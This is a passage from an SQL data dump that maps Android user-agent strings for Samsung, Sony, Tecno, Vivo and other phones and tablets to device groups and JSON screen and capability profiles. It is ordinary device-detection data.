Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N976B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N976U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N976V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N980F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N981B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N985F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N986B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N986U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-N986U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-S102DL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-S205DL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-S215DL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-T290) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-T295) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-T510) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SM-T590) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SNE-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SNE-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SNE-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SNE-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SO-01L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SO-01M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SO-02L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SO-03K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SO-04K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SO-05K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SO-41A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SOG02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SOV37) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SOV38) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SOV39) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SOV41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SOV42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SOV43) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; STK-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; STK-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; STK-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; STK-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; T766H_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; T766J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; T770H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; T780H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TAS-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO B1g) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO BB2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO BC1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO BC2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO BC2c) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO BC3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO BD2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO CD6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO CD6j) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO CD7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO CD8j) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO CE7j) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO CE8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO CE9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO KB8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO KC8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO KD6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO KD6a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO KD7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO KD7h) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO KE5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO KE5j) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO KE5k) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO KE6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO KE7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO LC7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO LC8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; TECNO LD7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":820,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Titan P8000 PRO 2021) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Twist 4 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; V2022) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; V2023) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; V2026) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; V2027) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; V2029) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; V2032) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; V2043) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; VCE-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; VOG-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; VOG-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; VOG-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 